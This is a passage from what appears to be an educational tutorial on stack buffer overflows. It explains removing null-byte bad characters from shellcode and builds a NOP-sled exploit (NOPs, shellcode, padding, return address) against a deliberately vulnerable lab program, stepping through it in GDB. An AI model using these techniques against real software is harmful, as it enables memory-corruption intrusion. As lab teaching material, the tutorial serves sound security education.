I've added in an extra check that shows the length of the shellcode. The c code has detected that the shellcode is 15 bytes long, however our shellcode is much longer. 112 | 113 | ## Step 6 - Removing Bad Characters 114 | 115 | If you count through the raw shellcode 15 bytes, you'll notice that the 16th byte is \x00. In c 00 is used as a null terminator to represent the end of a string. Since most stack overflows in C are going to result from working with strings if we include a null terminator in our shellcode, then it's going to prevent the entire shellcode from being copied into the stack. This is what's refferred to as a bad character. Depending on the program there can be multiple bad characters as recall the program is initially processing our shellcode as data, mostly likely as ascii characters and it may filter out certain characters. 116 | 117 | In order to avoid this we need to re-write our shellcode to avoid these bad characters. In our example this is going to be to just avoid any null terminators. 118 | 119 | If you run objdump again and notice each of the opcodes we can see the offending instructions. 120 | 121 | mov rax, 0x1 122 | mov rdi, 0x1 123 | mov rdx, 0x8 124 | 125 | All of these instructions have 0s in their corresponding opcodes, this is because when we move a single integer into the full registers it's actually moved as 0x00000001. We can easily get around this though. 126 | 127 | Insted of moving into the full register, we can instead mov into the low byte only. For example: 128 | 129 | mov al, 1 130 | 131 | When we move into al directly, there is no guarantee of the state of the rest of the bytes of the register, however we need them all as 0. We know we can't use 0 in our assembly as this will result in a bad character, luckily we can use xor as xoring anything with itself results in 0. 132 | 133 | xor rax, rax 134 | mov al, 1 135 | 136 | Is the equivalent of mov rax, 0x1 however without any bad characters. Now we can modify our shellcode using that same stragey for all offending instructions. 137 | 138 | I've included my solution in print_shellcode_rm_bad_chars.s 139 | 140 | Now we can repeat the exact same steps we did before to extract the raw shellcode. 141 | 142 | Firstly, if you run objdump on it you'll notice we have no 00 in the opcodes. 143 | 144 | Extracting the shellcode and placing it into the tester c code, compiling and running you'll notice we now have a length of 29 bytes, which if you count it out is the correct amount. We're now ready to put this into an exploit and run it. 145 | 146 | ## Step 7 - Crafting an Exploit 147 | 148 | Now that we have our shellcode working properly we need to craft an exploit to package it up as an input to the overflowme program which we've identified is vulnerable to a stack overflow. 149 | 150 | Similar to in the previous level we'll need to fill up the stack to overwrite into the return address with an address we control. This time though instead of filling the stack completely with with "A"s we'll need to insert our shellcode and then be able to find the start of that shell code in the stack so we can fill the return address with that address and jump to it. 151 | 152 | Let's start by simply running the program as intended in GDB 153 | 154 | ```bash 155 | gdb ./overflowme 156 | ``` 157 | 158 | Then, let's set up one breakpoint to catch the code before it returns from the function call: 159 | 160 | `b before_function_return` 161 | 162 | Now we can run the program with `r` and it should automatically stop when we are prompted with an input, put anything here you'd like, there is no need to overflow it. Next continue with `c` and you should now be halted at the breakpoint before the function call. 163 | 164 | Now let's take a look at the stack layout with: 165 | 166 | `x/66xg $rsp` 167 | 168 | This displays the 66 quad-words in hex format starting from the stack pointer upwards. Now we can get an idea of where the stack is, for me 0x7fffffffda20 is pretty close to the middle of it. We can start with this as our return address. 169 | 170 | Now that we have an idea of where we want to land let's start crafting our exploit. 171 | 172 | Previously we just filled the stack completely with "A"s to overwrite all the way into the basepointer and then our return address at the end to be overwritten into the return address, this time we need our shellcode in the stack. For our shellcode to work properly we need to land perfectly at the start of it, this creates somewhat of a needle in the haystack scenario. To get around this we'll employ what's called a NOP sled. The NOP instruction stands for No Operation and tells the processor to do nothing and move onto the next instruction. If we place all NOPs before our shellcode then as long as we land somewhere in the NOPs it will continue on doing "nothing" until it hits the first line of our shellcode. 173 | 174 | We'll still want some padding between our exploit code and the stack though so that it doesn't get peeled away by the function epilogue when it pops of what should be the preserved callers basepointer. Because of that we'll want our exploit to look something like: 175 | 176 | NOPs + Shellcode + Padding + Return Address 177 | 178 | Recall that we need the exploit string to be 520 bytes long to fill up the stack and properly write the return address. 179 | 180 | We can work backwards from this as we know the length of our shellcode and the return address. Next I usually start with a padding size that's roughly 1/4 of our whole string, I went with 128 bytes, which means the remaining bytes can all be NOPs. 181 | 182 | Let's create a our exploit string now: 183 | 184 | ```bash 185 | python3 exploit.py > exploit 186 | ``` 187 | 188 | Now let's head back over to gdb and run through this with the exploit passed in. 189 | 190 | ```bash 191 | gdb ./overflowme 192 | ``` 193 | 194 | Again set up a breakpoint to catch the code before it returns from the function call: 195 | 196 | `b before_function_return` 197 | 198 | Now run it and pass the exploit into stdin 199 | 200 | `r < exploit` 201 | 202 | Once it hits the breakpoint, let's reinvestigate the layout of the stack with: 203 | 204 | `x/66xg $rsp` 205 | 206 | You should see at the bottom of the stack the return address we added, then moving up stack next the padding which is all A or (41 in its ascii representation), then the exploit shell code and then finally the nop sled (x90 is NOP in x86-64). If we've got everything right then the return address we added should be pointing to somewhere in the nopsled. 207 | 208 |
209 |
215 |